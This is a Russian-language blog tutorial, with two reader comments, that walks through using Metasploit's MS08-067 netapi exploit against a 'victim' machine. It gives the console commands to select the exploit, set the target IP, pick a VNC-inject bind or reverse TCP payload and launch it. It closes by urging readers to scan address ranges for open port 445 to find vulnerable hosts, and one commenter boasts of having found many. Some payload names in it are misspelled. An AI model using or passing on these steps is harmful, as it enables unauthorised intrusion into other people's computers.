В этой статье мы покажем на простом примере на что способен MSF. Для примера будем использовать MS08-067 netapi exploit. Также освоим основные команды.
Запускаем консоль :
Команда show exploits показывает все доступные эксплоиты. Как видите выбирать есть из чего. Имеются эксплоиты под разные платформы: Windows, Linux, IIS, Apach и т.д :
Сейчас мы опишем процедуру выбора определенного эксплоита и его запуска. Команда use [название эксплоита] активирует его рабочую среду. Мы будем использовать как пример MS08-067 netapi exploit.
Набираем : use windows/smb/ms08_067_netapi
Чтобы вернуться назад - используем команду back.
Чтобы узнать больше инфы об эксплоите - info.
Ну так значит, вот, мы и в рабочей среде эксплоита. Набираем show options чтьб увидеть какие условия необходимо выполнить:
Этот эксплоит твебует введения трех параметров : RHOST - IP адресс цели необходимо указать (остальные уже заполнены по умолчанию).
Набираем set RHOST [IP адресс жертвы] :
Команда show payloads выводит все начинки, которые можно использовать с данным эксплоитом.
Мы будем использовать начинку windos/vncinject/bind_tcp
Набираем set PAYLOAD windows/vcninject/bind_tcp
Если вы подозреваете, что на машине жертвы может стоять фаервол, тогда используем windows/vcninject/reverse_tcp.
Ну вот, все готово, теперь командуем exploit или run. Эта команда запускает выбранный и настроенный эксплоит против жертвы :
Ну вот и все - мы в компе у жертвы и можем делать все, что захотим... :)
Video [TuT] на инглише.
Уязвимость правда довольно старенькая, но тачки с ней еще встречаются, так что вперед сканим диапазоны на открытый 445 й порт. Удачи :)
$vz00r
Inscription à :
Publier les commentaires (Atom)
оо, таких я машин насканил немало:)
RépondreSupprimerВзур, спасибо за статьи, вот только жаль что ты забросил блог :\
RépondreSupprimer